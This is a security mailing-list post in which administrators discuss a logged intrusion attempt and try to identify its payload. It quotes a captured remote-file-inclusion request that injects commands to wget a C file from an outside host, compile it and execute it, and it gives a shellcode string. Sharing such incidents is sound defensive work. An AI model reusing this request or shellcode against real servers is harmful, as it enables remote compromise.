lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: gml at phrick.net (gml) Subject: http://xfteam.net/fedor.c - Anyone seen this before?? actually the closer i look at c4 i think it might just be sd's bindtty.c which is part of suckit. char sig[]="\x31\xdb\x31\xc0\x31\xd2\xb2\x08\x68\x67\x6d\x6c\x0a\x89\xe1\xb0\x04\xcd\x80\xb0\x01\xcd\x80"; Dan wrote: >Hi, >Our Snort picked up an interesting attempt to download, compile and execute. >Noting also the fact that the sub dir its attempting to access has not been >there for over 4 months(/logjam/)? > >Has anyone actually seen what this fedor.c is? I have done some google'ing but >it comes up blank. > >Has anyone else noticed this kindof request recently? > >Is it just me or is xfteam.net not resolving anyway? > >Orignal HTTP request: >GET /logjam/showhits.php? >rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f > >Breaking this down we get(twice): >uname -a >cd /tmp >wget http://xfteam.net/fedor.c >gcc -o f fedor.c >./f > > >Regards, >Daniel. > > > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.netsys.com/full-disclosure-charter.html > >
Powered by blists - more mailing lists